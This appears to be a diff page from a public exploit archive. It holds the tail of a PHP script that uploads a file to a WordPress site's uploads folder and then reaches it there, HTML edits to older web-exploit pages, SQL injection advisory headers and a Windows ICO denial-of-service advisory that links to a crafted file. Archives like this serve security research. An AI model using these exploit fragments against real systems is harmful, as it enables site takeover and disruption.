array('FileDATA'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
# http://[Target]/wp-content/uploads/2013/12/file.php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #

2
platforms/php/webapps/3633.htm
View file

@ -277,7 +277,7 @@ return false;
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden">&lt;/textarea&gt; <br>
<p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>

2
platforms/php/webapps/3931.htm
View file

@ -276,7 +276,7 @@ return false;
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden">&lt;/textarea&gt; <br>
<p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>

1
platforms/php/webapps/6950.txt
View file

@ -1,4 +1,3 @@
paidversion (tr.php id) Remote SQL Injection Vulnerability
___________________________________

1
platforms/php/webapps/8619.txt
View file

@ -1,4 +1,3 @@
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .

9
platforms/windows/dos/30160.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24346/info
Microsoft Windows is prone to a remote denial-of-service vulnerability because it fails to properly handle maliciously crafted ICO files.
An attacker may exploit this issue by enticing victims into opening a malicious file.
Successful exploits will result in denial-of-service conditions on applications using the affected library. Applications such as Windows Explorer or Picture and Fax viewer have been identified as vulnerable.
http://www.exploit-db.com/sploits/30160.ico.zip

Some files were not shown because too many files have changed in this diff Show more